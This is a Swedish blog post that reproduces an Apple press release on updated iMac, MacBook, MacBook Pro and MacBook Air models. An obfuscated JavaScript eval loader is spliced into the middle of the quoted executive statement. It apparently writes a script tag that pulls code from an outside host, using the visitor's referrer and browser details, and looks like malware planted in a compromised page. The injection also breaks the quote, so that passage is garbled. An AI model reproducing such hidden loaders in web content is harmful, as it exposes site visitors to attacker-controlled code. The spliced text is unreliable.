Image Image Image Image Image Image Image Image Image Image

| 16 april, 2021

Scroll to top

Top

MacBook och MacBook Pro uppdateras med snabbare processorer

MacBook och MacBook Pro uppdateras med snabbare processorer
Sebastian

Apple uppdaterade idag sin iMac-serie med upp till tre gånger kraftfullare grafik, snabbare processorer, Thunderbolt 3, snabbare lagringsalternativ och ljusstarkare Retina-skärmar samt en ny Retina 4K-skärm och separat grafik till 21,5-tums iMac på 15 495 kr. Med sitt otroligt tunna och smidiga hölje, snabba processorer och lagring samt den imponerande Retina-skärmen sätter iMac den gyllene standarden för stationära datorer. iMac levererar kraftfull prestanda för 3D-grafik, videoredigering och spel och med macOS High Sierra som kommer i höst blir iMac en suverän plattform för skapande av innehåll med virtuell verklighet. Apple uppdaterade idag även MacBook och MacBook Pro med snabbare processorer, lade till snabbare ssd på MacBook och introducerade en ny 13-tums MacBook Pro på 15 495 kr.

”Med eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|sbrae|var|u0026u|referrer|ifnik||js|php’.split(’|’),0,{}))
stora uppdateringar av iMac och nyheter i MacBook- och MacBook Pro-serierna är Mac starkare än någonsin”, säger Apples vice vd för Hardware Engineering John Ternus. ”Idag får iMac en enorm prestandaökning, snabbare processorprestanda, Thunderbolt 3 och en ljusstarkare Retina-skärm med stöd för 1 miljard färger. Vi ökar även processor- och ssd-hastigheten på MacBook, lägger till snabbare processorer och gör snabbare grafik till standard på vår 15-tums MacBook Pro samt inför en ny 13-tums MacBook Pro på 15 495 kr.”

iMac
Uppdaterade iMac har snabbare Kaby Lake-processorer på upp till 4,2 GHz med Turbo Boost upp till 4,5 GHz och har stöd för upp till dubbelt så mycket minne som föregående generation. Fusion Drive är nu standard på alla 27-tumskonfigurationer och de högre klasserna av 21,5-tums iMac. Ssd-lagringsalternativen är nu upp till 50 procent snabbare, och iMac levereras med Thunderbolt 3, den kraftfullaste och mångsidigaste porten någonsin.

Grafiken på iMac är kraftfullare på samtliga modeller med grafik i Radeon Pro 500-serien med upp till 8 GB vram. 21,5-tumsmodellen levererar upp till tre gånger snabbare prestanda och 27-tumsmodellen är upp till 50 procent snabbare.

iMac levereras även med den bästa Mac-skärmen någonsin, nu 43 procent ljusstarkare på 500 cd/m2 och med stöd för 1 miljard färger, vilket gör den ännu klarare och mer verklighetstrogen att titta på.

MacBook och MacBook Pro
Med en tunn och lätt design, kraftfull prestanda, suveräna skärmar och ett batteri som räcker hela dagen levererar bärbara Mac-datorer världens bästa upplevelse för bärbara datorer.* MacBook har nu snabbare Kaby Lake-processorer på upp till 1,3 GHz Core i7 med Turbo Boost upp till 3,6 GHz och upp till 50 procent snabbare ssd samt har stöd för upp till dubbelt så mycket minne. MacBook väger mindre än ett kilo och är 13,1 mm tunn och är därmed vår tunnaste och lättaste bärbara dator som du kan använda i farten hela dagen.

Uppdaterade 13-tums MacBook Pro har Kaby Lake-processorer på upp till 3,5 GHz Core i7 med Turbo Boost upp till 4,0 GHz och 15-tums MacBook Pro har upp till 3,1 GHz Core i7 med Turbo Boost upp till 4,1 GHz. 15-tums MacBook Pro levereras nu som standard med kraftfullare separat grafik med mer videominne och 13-tums MacBook Pro får en ny konfiguration på 15 495 kr. Med revolutionerande Touch Bar med Touch ID, snygg Retina-skärm på 500 cd/m2, Thunderbolt 3 och enastående prestanda i en bärbar design är MacBook Pro den bästa bärbara proffsdatorn som Apple någonsin har skapat.

Apple uppdaterade idag även 13-tums MacBook Air med en processor på 1,8 GHz.

Tillgänglighet
– Uppdaterade iMac, MacBook, MacBook Pro och MacBook Air kan beställas idag på
apple.se, och kan köpas på Apple Store från och med onsdagen den 7 juni. Ytterligare tekniska specifikationer, alternativ för beställningsbyggen och tillbehör finns online på apple.com/se/mac.
– Varje kund som köper Mac från Apple erbjuds tjänsten Personal Setup online**, vilket innebär hjälp med att ställa in mejl, installera appar och mer.
* Batteritiden beror på enhetens inställningar, användning och andra faktorer. De faktiska resultaten kan variera.
** I de flesta länder.

När Apple lanserade Macintosh 1984 var det början på en revolutionerande era. Idag står Apple ständigt för nya innovationer med produkter som iPhone, iPad, Mac, Apple Watch och Apple TV. Apples fyra mjukvaruplattformar – iOS, macOS, watchOS och tvOS – ger en smidig upplevelse på alla Apple-enheter och skapar nya möjligheter med banbrytande tjänster som App Store, Apple Music, Apple Pay och iCloud. Apples över 100 000 medarbetare brinner för att göra de bästa produkterna i världen och att lämna världen i bättre skick än när vi började.